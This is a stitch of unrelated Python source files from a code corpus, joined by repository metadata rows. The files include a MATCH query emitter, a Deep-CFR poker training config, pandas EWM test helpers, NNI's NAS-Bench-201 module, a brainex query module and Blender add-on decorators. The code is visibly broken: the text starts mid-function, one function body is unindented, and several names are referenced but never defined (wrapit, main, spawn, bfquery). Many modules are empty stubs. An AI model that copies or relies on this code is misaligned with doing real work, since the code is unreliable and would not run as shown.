raise AssertionError(u"Location unexpectedly pointed to a field: {}".format(location))
return mark_name
def _first_step_to_match(match_step):
    """Transform the very first MATCH step into a MATCH query string."""
    parts = []
    if match_step.root_block is not None:
        # Only a QueryRoot may start a traversal; anything else is a compiler bug.
        if not isinstance(match_step.root_block, QueryRoot):
            raise AssertionError(u"Expected None or QueryRoot root block, received: " u"{} {}".format(match_step.root_block, match_step))
        match_step.root_block.validate()
        start_class = get_only_element_from_collection(match_step.root_block.start_class)
        parts.append(u"class: %s" % (start_class,))
    # Type coercion is not representable on the first step.
    if match_step.coerce_type_block is not None:
        raise AssertionError(u"Invalid MATCH step: {}".format(match_step))
    if match_step.where_block:
        match_step.where_block.validate()
        parts.append(u"where: (%s)" % (match_step.where_block.predicate.to_match(),))
    # Every step must be marked with a location so later steps can refer to it.
    if match_step.as_block is None:
        raise AssertionError(u"Found a MATCH step without a corresponding Location. " u"This should never happen: {}".format(match_step))
    else:
        match_step.as_block.validate()
        parts.append(u"as: %s" % (_get_vertex_location_name(match_step.as_block.location),))
    # Doubled braces are literal "{ ... }" in the emitted MATCH syntax.
    return u"{{ %s }}" % (u", ".join(parts),)
def _subsequent_step_to_match(match_step):
    """Transform any subsequent (non-first) MATCH step into a MATCH query string."""
    # Non-first steps must move through an edge: either a Traverse or a Recurse.
    if not isinstance(match_step.root_block, (Traverse, Recurse)):
        raise AssertionError(u"Expected Traverse root block, received: " u"{} {}".format(match_step.root_block, match_step))
    is_recursing = isinstance(match_step.root_block, Recurse)
    match_step.root_block.validate()
    traversal_command = u".%s('%s')" % (match_step.root_block.direction, match_step.root_block.edge_name)
    parts = []
    if match_step.coerce_type_block:
        # MATCH can only coerce to exactly one class per step.
        coerce_type_set = match_step.coerce_type_block.target_class
        if len(coerce_type_set) != 1:
            raise AssertionError(u"Found MATCH type coercion block with more than one target class:" u" {} {}".format(coerce_type_set, match_step))
        coerce_type_target = list(coerce_type_set)[0]
        parts.append(u"class: %s" % (coerce_type_target,))
    if is_recursing:
        # Recursion is bounded by the depth recorded on the Recurse block.
        parts.append(u"while: ($depth < %d)" % (match_step.root_block.depth,))
    if match_step.where_block:
        match_step.where_block.validate()
        parts.append(u"where: (%s)" % (match_step.where_block.predicate.to_match(),))
    # "optional" applies only to Traverse steps; Recurse has no such flag here.
    if not is_recursing and match_step.root_block.optional:
        parts.append(u"optional: true")
    if match_step.as_block:
        match_step.as_block.validate()
        parts.append(u"as: %s" % (_get_vertex_location_name(match_step.as_block.location),))
    return u"%s {{ %s }}" % (traversal_command, u", ".join(parts))
def _represent_match_traversal(match_traversal):
    """Emit MATCH query code for an entire MATCH traversal sequence."""
    # The first step has different syntax from every later step.
    first_step, later_steps = match_traversal[0], match_traversal[1:]
    rendered = [_first_step_to_match(first_step)]
    rendered.extend(_subsequent_step_to_match(step) for step in later_steps)
    return u"".join(rendered)
def _represent_fold(fold_location, fold_ir_blocks):
    """Emit a LET clause corresponding to the IR blocks for a @fold scope."""
    start_let_template = u"$%(mark_name)s = %(base_location)s"
    traverse_edge_template = u'.%(direction)s("%(edge_name)s")'
    base_template = start_let_template + traverse_edge_template
    edge_direction, edge_name = fold_location.get_first_folded_edge()
    mark_name, _ = fold_location.get_location_name()
    base_location_name, _ = fold_location.base_location.get_location_name()
    # All interpolated names end up in the emitted query text, so validate
    # each one to avoid producing malformed/unsafe MATCH code.
    validate_safe_string(mark_name)
    validate_safe_string(base_location_name)
    validate_safe_string(edge_direction)
    validate_safe_string(edge_name)
    template_data = {"mark_name": mark_name, "base_location": base_location_name, "direction": edge_direction, "edge_name": edge_name}
    final_string = base_template % template_data
    # Append one clause per IR block inside the fold.
    for block in fold_ir_blocks:
        if isinstance(block, Filter):
            # Filters become inline [...] predicates on the traversal chain.
            final_string += u"[" + block.predicate.to_match() + u"]"
        elif isinstance(block, Traverse):
            template_data = {"direction": block.direction, "edge_name": block.edge_name}
            final_string += traverse_edge_template % template_data
        elif isinstance(block, MarkLocation):
            # Locations inside a fold have no textual representation.
            pass
        else:
            raise AssertionError(u"Found an unexpected IR block in the folded IR blocks: " u"{} {} {}".format(type(block), block, fold_ir_blocks))
    # Collect the folded traversal's results into a list value.
    final_string += ".asList()"
    return final_string
def _construct_output_to_match(output_block):
"""Transform a ConstructResult block into a MATCH query string."""
output_block.validate()
selections = (u"%s AS `%s`" % (output_block.fields[key].to_match(), key) for key in sorted(output_block.fields.keys()))
return u"SELECT %s FROM" % (u", ".join(selections),)
def _construct_where_to_match(where_block):
    """Transform a Filter block into a MATCH query string."""
    # A tautological TrueLiteral filter should never reach emission --
    # presumably earlier lowering passes remove it; treat it as a bug.
    if where_block.predicate == TrueLiteral:
        raise AssertionError(u"Received WHERE block with TrueLiteral predicate: {}".format(where_block))
    return u"WHERE " + where_block.predicate.to_match()
def emit_code_from_single_match_query(match_query):
    """Return a MATCH query string from a list of IR blocks."""
    # Pieces are accumulated in a deque because the SELECT prefix and the
    # "MATCH (" opener are prepended after the traversals are rendered.
    query_data = deque([u"MATCH "])
    if not match_query.match_traversals:
        raise AssertionError(u"Unexpected falsy value for match_query.match_traversals received: " u"{} {}".format(match_query.match_traversals, match_query))
    match_traversal_data = [_represent_match_traversal(x) for x in match_query.match_traversals]
    # Comma-separate multiple traversals within the MATCH clause.
    query_data.append(match_traversal_data[0])
    for traversal_data in match_traversal_data[1:]:
        query_data.append(u", ")
        query_data.append(traversal_data)
    query_data.appendleft(u" (")
    query_data.append(u"RETURN $matches)")
    # Each @fold scope becomes a LET clause; sorted for deterministic output.
    fold_data = sorted([_represent_fold(fold_location, fold_ir_blocks) for fold_location, fold_ir_blocks in six.iteritems(match_query.folds)])
    if fold_data:
        query_data.append(u" LET ")
        query_data.append(fold_data[0])
        for fold_clause in fold_data[1:]:
            query_data.append(u", ")
            query_data.append(fold_clause)
    # Prepend the SELECT ... FROM prefix, then append the global WHERE if any.
    query_data.appendleft(_construct_output_to_match(match_query.output_block))
    if match_query.where_block is not None:
        query_data.append(_construct_where_to_match(match_query.where_block))
    return u" ".join(query_data)
def emit_code_from_multiple_match_queries(match_queries):
    """Return a MATCH query string from a list of MatchQuery namedtuples."""
    # Each sub-query is bound to $optional__<i>, then all are UNIONALL-ed
    # into $result, which the outer SELECT EXPAND()s into rows.
    optional_variable_base_name = "$optional__"
    union_variable_name = "$result"
    query_data = deque([u"SELECT EXPAND(", union_variable_name, u")", u" LET "])
    optional_variables = []
    sub_queries = [emit_code_from_single_match_query(match_query) for match_query in match_queries]
    for (i, sub_query) in enumerate(sub_queries):
        variable_name = optional_variable_base_name + str(i)
        variable_assignment = variable_name + u" = ("
        sub_query_end = u"),"
        query_data.append(variable_assignment)
        query_data.append(sub_query)
        query_data.append(sub_query_end)
        optional_variables.append(variable_name)
    # Final LET binding: union of all the sub-query variables.
    query_data.append(union_variable_name)
    query_data.append(u" = UNIONALL(")
    query_data.append(u", ".join(optional_variables))
    query_data.append(u")")
    return u" ".join(query_data)
def emit_code_from_ir(schema_info, compound_match_query):
    """Return a MATCH query string from a CompoundMatchQuery."""
    match_queries = compound_match_query.match_queries
    if not match_queries:
        raise AssertionError(u"Received CompoundMatchQuery with an empty list of MatchQueries: " u"{}".format(match_queries))
    # A single query emits directly; multiple queries are union-ed together.
    if len(match_queries) == 1:
        return emit_code_from_single_match_query(match_queries[0])
    return emit_code_from_multiple_match_queries(match_queries)
c794ff339d897246d1f9ee7d50c25c7781c1ee06 | 3,286 | py | Python | mo_leduc.py | mohamedun/Deep-CFR | ec3a7fb06e11bd6cc65bb2bf6f16108ee41f7234 | [
"MIT"
] | null | null | null | mo_leduc.py | mohamedun/Deep-CFR | ec3a7fb06e11bd6cc65bb2bf6f16108ee41f7234 | [
"MIT"
] | null | null | null | mo_leduc.py | mohamedun/Deep-CFR | ec3a7fb06e11bd6cc65bb2bf6f16108ee41f7234 | [
"MIT"
] | null | null | null | from PokerRL.game.games import StandardLeduc
from PokerRL.game.games import BigLeduc
from PokerRL.eval.rl_br.RLBRArgs import RLBRArgs
from PokerRL.eval.lbr.LBRArgs import LBRArgs
from PokerRL.game.bet_sets import POT_ONLY
from DeepCFR.EvalAgentDeepCFR import EvalAgentDeepCFR
from DeepCFR.TrainingProfile import TrainingProfile
from DeepCFR.workers.driver.Driver import Driver
import pdb
if __name__ == '__main__':
    # Configure SD-CFR training on Big Leduc poker, evaluated with both a
    # best-response (br) and local best-response (lbr) evaluator.
    ctrl = Driver(t_prof=TrainingProfile(name="MO_LEDUC_BigLeduc_LBR",
                                         nn_type="feedforward",
                                         eval_agent_export_freq=3,
                                         checkpoint_freq=3,
                                         n_learner_actor_workers=5,
                                         max_buffer_size_adv=1e6,
                                         n_traversals_per_iter=500,
                                         n_batches_adv_training=250,
                                         mini_batch_size_adv=2048,
                                         game_cls=BigLeduc,
                                         n_units_final_adv=64,
                                         n_merge_and_table_layer_units_adv=64,
                                         init_adv_model="random",  # warm start neural weights with init from last iter
                                         use_pre_layers_adv=False,  # shallower nets
                                         use_pre_layers_avrg=False,  # shallower nets

                                         # You can specify one or both modes. Choosing both is useful to compare them.
                                         eval_modes_of_algo=(
                                             EvalAgentDeepCFR.EVAL_MODE_SINGLE,  # SD-CFR
                                         ),

                                         DISTRIBUTED=True,
                                         log_verbose=True,
                                         rl_br_args=RLBRArgs(rlbr_bet_set=None,
                                                             n_hands_each_seat=200,
                                                             n_workers=1,
                                                             # Training
                                                             DISTRIBUTED=False,
                                                             n_iterations=100,
                                                             play_n_games_per_iter=50,
                                                             # The DDQN
                                                             batch_size=512,
                                                             ),
                                         lbr_args=LBRArgs(n_lbr_hands_per_seat=30000,
                                                          n_parallel_lbr_workers=10,
                                                          DISTRIBUTED=True,
                                                          ),
                                         ),
                  eval_methods={'br': 1,
                                # 'rlbr': 1,
                                'lbr': 1,
                                },
                  n_iterations=12)
    ctrl.run()
    # Fix: removed a leftover `pdb.set_trace()` debugger breakpoint that would
    # halt the script after training completed.
| 54.766667 | 119 | 0.370663 |
c7964aa0abe4f31ae2f01cae5205b2c444d9f154 | 8,436 | py | Python | geocircles/backend/gamestate.py | tmick0/geocircles | 12845d006eeb0a4032679209a953c1cb072d06d7 | [
"MIT"
] | null | null | null | geocircles/backend/gamestate.py | tmick0/geocircles | 12845d006eeb0a4032679209a953c1cb072d06d7 | [
"MIT"
] | null | null | null | geocircles/backend/gamestate.py | tmick0/geocircles | 12845d006eeb0a4032679209a953c1cb072d06d7 | [
"MIT"
] | null | null | null | import sqlite3
from enum import Enum
import random
__all__ = ['state_mgr', 'game_state', 'next_state']
| 36.838428 | 159 | 0.580844 |
c79748fa89a41d17ad6e31fcee8a32474231a1c4 | 27 | py | Python | tests/unit/providers/callables/__init__.py | YelloFam/python-dependency-injector | 541131e33858ee1b8b5a7590d2bb9f929740ea1e | [
"BSD-3-Clause"
] | null | null | null | tests/unit/providers/callables/__init__.py | YelloFam/python-dependency-injector | 541131e33858ee1b8b5a7590d2bb9f929740ea1e | [
"BSD-3-Clause"
] | null | null | null | tests/unit/providers/callables/__init__.py | YelloFam/python-dependency-injector | 541131e33858ee1b8b5a7590d2bb9f929740ea1e | [
"BSD-3-Clause"
] | null | null | null | """Tests for callables."""
| 13.5 | 26 | 0.62963 |
c799f39a2d11cd8cf47042ccb70ce866c8193b11 | 191 | py | Python | dss/dss_capi_gr/__init__.py | dss-extensions/dss_python | f6c4440a14287d06f1bd10180484b349f764ba7e | [
"BSD-3-Clause"
] | 24 | 2019-03-07T20:24:24.000Z | 2022-03-23T17:58:00.000Z | dss/dss_capi_gr/__init__.py | dss-extensions/dss_python | f6c4440a14287d06f1bd10180484b349f764ba7e | [
"BSD-3-Clause"
] | 32 | 2019-02-14T03:46:31.000Z | 2022-03-23T00:01:28.000Z | dss/dss_capi_ir/__init__.py | PMeira/dss_python | 2dbc72ed875108d3f98d21cb0a488bab6b0d7f4c | [
"BSD-3-Clause"
] | 5 | 2019-02-19T04:54:49.000Z | 2022-03-23T10:40:51.000Z | '''
A compatibility layer for DSS C-API that mimics the official OpenDSS COM interface.
Copyright (c) 2016-2019 Paulo Meira
'''
from __future__ import absolute_import
from .IDSS import IDSS
| 23.875 | 83 | 0.78534 |
c79a2fb3f10def9e365b5ba6af795f7018c3bbe1 | 693 | py | Python | museflow/components/embedding_layer.py | BILLXZY1215/museflow | 241a98ef7b3f435f29bd5d2861ac7b17d4c091d8 | [
"BSD-3-Clause"
] | null | null | null | museflow/components/embedding_layer.py | BILLXZY1215/museflow | 241a98ef7b3f435f29bd5d2861ac7b17d4c091d8 | [
"BSD-3-Clause"
] | null | null | null | museflow/components/embedding_layer.py | BILLXZY1215/museflow | 241a98ef7b3f435f29bd5d2861ac7b17d4c091d8 | [
"BSD-3-Clause"
] | null | null | null | from .component import Component, using_scope
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
| 27.72 | 78 | 0.681097 |
c79bb693d6ca4d67f78e8585c83eae0b233a16e3 | 76 | py | Python | hydrocarbon_problem/env/__init__.py | lollcat/Aspen-RL | 0abefb9e7def7762e829ac4d621519d9d01592c0 | [
"MIT"
] | 1 | 2021-12-09T04:27:33.000Z | 2021-12-09T04:27:33.000Z | hydrocarbon_problem/env/__init__.py | lollcat/Aspen-RL | 0abefb9e7def7762e829ac4d621519d9d01592c0 | [
"MIT"
] | 2 | 2021-12-09T08:47:12.000Z | 2022-03-25T16:07:56.000Z | hydrocarbon_problem/env/__init__.py | lollcat/Aspen-RL | 0abefb9e7def7762e829ac4d621519d9d01592c0 | [
"MIT"
] | 1 | 2022-03-23T13:53:54.000Z | 2022-03-23T13:53:54.000Z | from hydrocarbon_problem.env.types_ import Observation, Done, Stream, Column | 76 | 76 | 0.855263 |
c79c07c8078e5f1d72628e2e7fc0c80e75f6489c | 12,955 | py | Python | addon_common/common/decorators.py | Unnoen/retopoflow | 73c7cfc10a0b58937198d60e308ba5248b446490 | [
"OML"
] | 1 | 2022-01-10T23:40:21.000Z | 2022-01-10T23:40:21.000Z | addon_common/common/decorators.py | Unnoen/retopoflow | 73c7cfc10a0b58937198d60e308ba5248b446490 | [
"OML"
] | null | null | null | addon_common/common/decorators.py | Unnoen/retopoflow | 73c7cfc10a0b58937198d60e308ba5248b446490 | [
"OML"
] | null | null | null | '''
Copyright (C) 2021 CG Cookie
http://cgcookie.com
hello@cgcookie.com
Created by Jonathan Denning, Jonathan Williamson
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os
import re
import json
import time
import inspect
from functools import wraps
import bpy
debug_run_test_calls = False
# corrected bug in previous version of blender_version fn wrapper
# https://github.com/CGCookie/retopoflow/commit/135746c7b4ee0052ad0c1842084b9ab983726b33#diff-d4260a97dcac93f76328dfaeb5c87688
def blender_version_wrapper(op, ver):
self = blender_version_wrapper
if not hasattr(self, 'fns'):
major, minor, rev = bpy.app.version
self.blenderver = '%d.%02d' % (major, minor)
self.fns = fns = {}
self.ops = {
'<': lambda v: self.blenderver < v,
'>': lambda v: self.blenderver > v,
'<=': lambda v: self.blenderver <= v,
'==': lambda v: self.blenderver == v,
'>=': lambda v: self.blenderver >= v,
'!=': lambda v: self.blenderver != v,
}
update_fn = self.ops[op](ver)
return wrapit
def only_in_blender_version(*args, ignore_others=False, ignore_return=None):
self = only_in_blender_version
if not hasattr(self, 'fns'):
major, minor, rev = bpy.app.version
self.blenderver = '%d.%02d' % (major, minor)
self.fns = {}
self.ignores = {}
self.ops = {
'<': lambda v: self.blenderver < v,
'>': lambda v: self.blenderver > v,
'<=': lambda v: self.blenderver <= v,
'==': lambda v: self.blenderver == v,
'>=': lambda v: self.blenderver >= v,
'!=': lambda v: self.blenderver != v,
}
self.re_blender_version = re.compile(r'^(?P<comparison><|<=|==|!=|>=|>) *(?P<version>\d\.\d\d)$')
matches = [self.re_blender_version.match(arg) for arg in args]
assert all(match is not None for match in matches), f'At least one arg did not match version comparison: {args}'
results = [self.ops[match.group('comparison')](match.group('version')) for match in matches]
version_matches = all(results)
return wrapit
def warn_once(warning):
return wrapper
class PersistentOptions:
class WrappedDict:
def __init__(self, cls, filename, version, defaults, update_external):
self._dirty = False
self._last_save = time.time()
self._write_delay = 2.0
self._defaults = defaults
self._update_external = update_external
self._defaults['persistent options version'] = version
self._dict = {}
if filename:
src = inspect.getsourcefile(cls)
path = os.path.split(os.path.abspath(src))[0]
self._fndb = os.path.join(path, filename)
else:
self._fndb = None
self.read()
if self._dict.get('persistent options version', None) != version:
self.reset()
self.update_external()
| 33.475452 | 143 | 0.542802 |
c79d02fd3237e472a6910ab89fe822c176242e9f | 11,414 | py | Python | venv/Lib/site-packages/pandas/tests/window/moments/test_moments_consistency_ewm.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 28,899 | 2016-10-13T03:32:12.000Z | 2022-03-31T21:39:05.000Z | venv/Lib/site-packages/pandas/tests/window/moments/test_moments_consistency_ewm.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 31,004 | 2016-10-12T23:22:27.000Z | 2022-03-31T23:17:38.000Z | venv/Lib/site-packages/pandas/tests/window/moments/test_moments_consistency_ewm.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 15,149 | 2016-10-13T03:21:31.000Z | 2022-03-31T18:46:47.000Z | import numpy as np
import pytest
from pandas import (
DataFrame,
Series,
concat,
)
import pandas._testing as tm
def create_mock_weights(obj, com, adjust, ignore_na):
    """
    Reference implementation of exponentially-weighted weights for either a
    DataFrame (computed column by column) or a Series.
    """
    if isinstance(obj, DataFrame):
        if not len(obj.columns):
            # Degenerate empty frame: nothing to weight.
            return DataFrame(index=obj.index, columns=obj.columns)
        # Compute weights per column, then reassemble into a frame with the
        # original index/column labels.
        w = concat(
            [
                create_mock_series_weights(
                    obj.iloc[:, i], com=com, adjust=adjust, ignore_na=ignore_na
                )
                for i, _ in enumerate(obj.columns)
            ],
            axis=1,
        )
        w.index = obj.index
        w.columns = obj.columns
        return w
    else:
        return create_mock_series_weights(obj, com, adjust, ignore_na)
def create_mock_series_weights(s, com, adjust, ignore_na):
    """
    Reference implementation of the exponentially-weighted observation
    weights for a single Series, mirroring pandas' ewm semantics for the
    given `com`, `adjust` and `ignore_na` settings. NaN entries get NaN
    weights; when ignore_na is False they still advance the decay counter.
    """
    weights = Series(np.nan, index=s.index)
    alpha = 1.0 / (1.0 + com)
    if adjust:
        decay_steps = 0
        for pos in range(len(s)):
            val = s.iat[pos]
            if val == val:  # NaN-check: NaN != NaN
                weights.iat[pos] = (1.0 / (1.0 - alpha)) ** decay_steps
                decay_steps += 1
            elif not ignore_na:
                decay_steps += 1
    else:
        running_weight_sum = 0.0
        last_valid = -1
        counter = 0
        for pos in range(len(s)):
            val = s.iat[pos]
            if val == val:  # NaN-check: NaN != NaN
                if last_valid == -1:
                    weights.iat[pos] = 1.0
                else:
                    gap = counter - last_valid
                    weights.iat[pos] = alpha * running_weight_sum / (1.0 - alpha) ** gap
                running_weight_sum += weights.iat[pos]
                last_valid = counter
                counter += 1
            elif not ignore_na:
                counter += 1
    return weights
| 34.173653 | 88 | 0.615297 |
c79e030266cfddaf92e93230023130a13241d6c0 | 6,895 | py | Python | brainex/query.py | ebuntel/BrainExTemp | 991038155a6e9289af90da3d800210841ef23ff1 | [
"MIT"
] | 1 | 2020-09-04T16:15:26.000Z | 2020-09-04T16:15:26.000Z | brainex/query.py | ebuntel/Brainextemp | 991038155a6e9289af90da3d800210841ef23ff1 | [
"MIT"
] | null | null | null | brainex/query.py | ebuntel/Brainextemp | 991038155a6e9289af90da3d800210841ef23ff1 | [
"MIT"
] | null | null | null |
# TODO finish implementing query
import math
from pyspark import SparkContext
# from genex.cluster import sim_between_seq
from brainex.op.query_op import sim_between_seq
from brainex.parse import strip_function, remove_trailing_zeros
from .classes import Sequence
from brainex.database import genexengine
def query(q: Sequence, gc: genexengine, loi: list, sc: SparkContext,
          k: int=1, ex_sameID: bool=False, overlap: float= 1.0, mode: str='genex'):
    """
    Dispatch a similarity query to the requested backend.

    :param q: query sequence
    :param gc: Gcluster in which to query
    :param loi: list of two integer values, specifying the query range, if set to None, is going to query all length
    :param sc: spark context on which to run the query operation
    :param k: integer, specifying to return top k matches
    :param ex_sameID: boolean, whether to include sequences from the time series with the same id as the query sequence
    :param overlap: float, how much overlapping between queries lookups
    :param mode: query mode, supported modes are 'genex' and 'bf' (bf = brute force)
    """
    # NOTE(review): both branches look unfinished (see module-level TODO):
    # gquery() is invoked without its required arguments, and bfquery is not
    # defined in this module -- either call would fail at runtime.
    if mode == 'genex':
        gquery()
    elif mode == 'bf':
        bfquery()
    else:
        raise Exception('Unsupported query mode: ' + mode)
def gquery(query_list: list, gc_data: dict, loi: list, input_list: list,
k:int=1, ex_sameID: bool=False, overlap: float= 1.0, ):
"""
Because Gcluster object doesn't have map property, we have to use dict as input
:param file:
:param gc_data:
:param loi:
:param input_list:
:param k:
:param ex_sameID:
:param overlap:
:return:
"""
# get query from id, start, end point
# get query from csv file
#
# query_list = []
# query_set = get_query_from_csv_with_id(file)
# print(query_set)
# for cur_query in query_set:
# query_list.append(get_query_from_sequence(cur_query[0], int(cur_query[1]), int(cur_query[2]), input_list))
# print(query_list)
return custom_query(query_list, loi, gc_data, k, input_list)
#
# def custom_query_operation(q: Sequence, gc: Gcluster, loi: list, sc: SparkContext,
# k:int=1, ex_sameID: bool=False, overlap: float= 1.0):
#
# query_result = filter_rdd_back.repartition(16).map(
# lambda clusters: custom_query(q, loi, gc, k,
# global_time_series_dict.value, ))
# # changed here
# # plot_query_result(query_sequence, query_result, global_time_series_dict.value)
# return query_result
def get_query_from_sequence(id: tuple, start: int, end: int, input_list: list):
"""
:param id:
:param start:
:param end:
:param input_list:
:return: a list
"""
try:
input_dict = dict(input_list) # validate by converting input_list into a dict
except (TypeError, ValueError):
raise Exception('sequence: fetch_data: input_list is not key-value pair.')
return input_dict[id][start: end]
def custom_query(query_sequences: list, loi: list, Gcluster_data:dict, k : int, input_list:list):
# """
#
# :param query_sequences: list of list: the list of sequences to be queried
# :param cluster: dict[key = representative, value = list of timeSeriesObj] -> representative is timeSeriesObj
# the sequences in the cluster are all of the SAME length
# :param k: int
# :return list of time series objects: best k matches. Again note they are all of the SAME length
# """
"""
:param query_sequences:
:param query_range:
:param Gcluster_data:
:param k:
:param input_list:
:return:
"""
# get query from csv file which contains lists of list of query actual clusters
# get query from csv file which contains lists of tuple of id, start, endpoint
query_result = dict()
if not isinstance(query_sequences, list) or len(query_sequences) == 0:
raise ValueError("query sequence must be a list and not empty")
cur_query_number = 0
if isinstance(query_sequences[0], list):
print("length of query is [" + str(len(query_sequences)) + "]" + "[" + str(len(query_sequences[0])) + "]")
print("query is a list of list")
for cur_query in query_sequences:
if isinstance(cur_query, list):
query_result[cur_query_number] = get_most_k_sim(cur_query, loi, Gcluster_data, k, input_list)
cur_query_number += 1
return query_result
else:
return get_most_k_sim(query_sequences, loi, Gcluster_data, k, input_list)
def get_most_k_sim(query_sequence: list, loi: list, Gcluster_data : dict, k, input_list:list):
"""
:param query_sequence:
:param query_range:
:param Gcluster_data:
:param k:
:param input_list:
:return:
"""
min_rprs = None # the representative that is closest to the query distance
min_dist = math.inf
target_cluster = []
print("length of gcluster clusters is " + str(len(Gcluster_data[1])))
for cur_rprs_seq in Gcluster_data[1].keys():
# TODO do we want to get raw clusters here, or set the raw in timeSeriesObj before calling query (no parsing)
if (cur_rprs_seq.end - cur_rprs_seq.start + 1) in range(loi[0], loi[1] + 1):
# modify here, not use get clusters from objects, use values
cur_dist = sim_between_seq(query_sequence, cur_rprs_seq.fetch_data(input_list))
if cur_dist < min_dist:
min_rprs = cur_rprs_seq
min_dist = cur_dist
else:
break
if min_rprs:
print('min representative is ' + min_rprs.__str__())
print('min dist' + str(min_dist))
# print("Querying Cluster of length: " + str(len(get_data_for_timeSeriesObj(min_rprs, time_series_dict))))
target_cluster = Gcluster_data[1].get(min_rprs)
print('len of cluster is ' + str(len(target_cluster)))
# print("sorting")
#
target_cluster.sort(key=lambda cluster_sequence: sim_between_seq(query_sequence,
cluster_sequence.data))
k = int(k)
return target_cluster[0:k] # return the k most similar sequences
else:
return None
| 33.634146 | 119 | 0.639014 |
c79e23eb5e67f7342ba09df2a42c01c2772ded3a | 4,161 | py | Python | main.py | orgr/arbitrage_bot | 39365dce0dcae0f6bb4baf1d7c32392e28b6c623 | [
"MIT"
] | null | null | null | main.py | orgr/arbitrage_bot | 39365dce0dcae0f6bb4baf1d7c32392e28b6c623 | [
"MIT"
] | 1 | 2021-12-13T03:48:08.000Z | 2021-12-13T04:58:36.000Z | main.py | orgr/arbitrage_bot | 39365dce0dcae0f6bb4baf1d7c32392e28b6c623 | [
"MIT"
] | null | null | null | import sys
import time
from typing import List
import asyncio
import ccxt.async_support as ccxt
# import ccxt
import itertools
from enum import Enum
if __name__ == '__main__':
asyncio.run(main())
| 30.152174 | 111 | 0.564768 |
c79ee6a1b6ebeba170b33fbfe523726f9f206dbb | 1,497 | py | Python | examples/click-ninja/clickninja-final.py | predicatemike/predigame | 096e8379beb1d40ccb3f19ed2bb3ad82b405bb7f | [
"Apache-2.0"
] | null | null | null | examples/click-ninja/clickninja-final.py | predicatemike/predigame | 096e8379beb1d40ccb3f19ed2bb3ad82b405bb7f | [
"Apache-2.0"
] | null | null | null | examples/click-ninja/clickninja-final.py | predicatemike/predigame | 096e8379beb1d40ccb3f19ed2bb3ad82b405bb7f | [
"Apache-2.0"
] | null | null | null | WIDTH = 20
HEIGHT = 14
TITLE = 'Click Ninja'
BACKGROUND = 'board'
score(color = PURPLE)
callback(spawn, 1)
keydown('r', reset)
| 24.145161 | 86 | 0.549766 |
c79f981e96642b4e8be1f381e054bf741fdc029f | 7,166 | py | Python | nni/retiarii/hub/pytorch/nasbench201.py | nbl97/nni | 1530339d3e964a5ea95a0afde1775ec9167cdcc0 | [
"MIT"
] | 2,305 | 2018-09-07T12:42:26.000Z | 2019-05-06T20:14:24.000Z | nni/retiarii/hub/pytorch/nasbench201.py | nbl97/nni | 1530339d3e964a5ea95a0afde1775ec9167cdcc0 | [
"MIT"
] | 379 | 2018-09-10T10:19:50.000Z | 2019-05-06T18:04:46.000Z | nni/retiarii/hub/pytorch/nasbench201.py | nbl97/nni | 1530339d3e964a5ea95a0afde1775ec9167cdcc0 | [
"MIT"
] | 314 | 2018-09-08T05:36:08.000Z | 2019-05-06T08:48:51.000Z | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import Callable, Dict
import torch
import torch.nn as nn
from nni.retiarii import model_wrapper
from nni.retiarii.nn.pytorch import NasBench201Cell
__all__ = ['NasBench201']
OPS_WITH_STRIDE = {
'none': lambda C_in, C_out, stride: Zero(C_in, C_out, stride),
'avg_pool_3x3': lambda C_in, C_out, stride: Pooling(C_in, C_out, stride, 'avg'),
'max_pool_3x3': lambda C_in, C_out, stride: Pooling(C_in, C_out, stride, 'max'),
'conv_3x3': lambda C_in, C_out, stride: ReLUConvBN(C_in, C_out, (3, 3), (stride, stride), (1, 1), (1, 1)),
'conv_1x1': lambda C_in, C_out, stride: ReLUConvBN(C_in, C_out, (1, 1), (stride, stride), (0, 0), (1, 1)),
'skip_connect': lambda C_in, C_out, stride: nn.Identity() if stride == 1 and C_in == C_out
else FactorizedReduce(C_in, C_out, stride),
}
PRIMITIVES = ['none', 'skip_connect', 'conv_1x1', 'conv_3x3', 'avg_pool_3x3']
| 34.786408 | 110 | 0.579542 |
c7a0f4dd6f424ce5b114a5129ff1abc4021aa810 | 1,195 | py | Python | setup.py | Pasha13666/dialog_py | c54a0e06dc0a5f86d9791b8cbd6fcfacb5b644ff | [
"MIT"
] | 1 | 2021-02-17T07:38:01.000Z | 2021-02-17T07:38:01.000Z | setup.py | Pasha13666/dialog_py | c54a0e06dc0a5f86d9791b8cbd6fcfacb5b644ff | [
"MIT"
] | null | null | null | setup.py | Pasha13666/dialog_py | c54a0e06dc0a5f86d9791b8cbd6fcfacb5b644ff | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import os
from setuptools import setup
with open(os.path.join(os.path.dirname(__file__), 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='dialog_py',
version='1.0a1',
description='Python API for cdialog/linux dialog',
long_description=long_description,
url='https://github.com/pasha13666/dialog_py',
author='Pasha__kun',
author_email='pasha2001dpa@ya.ru',
packages=['dialog_py'],
install_requires=[],
include_package_data=True,
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: Implementation :: CPython'
]
)
| 31.447368 | 88 | 0.620921 |
c7a18f6b2dc263a28bbb7cb8d8990ce3618a2615 | 8,334 | py | Python | test/test_who.py | rliebz/whoswho | 0c411e418c240fcec6ea0a23d15bd003056c65d0 | [
"MIT"
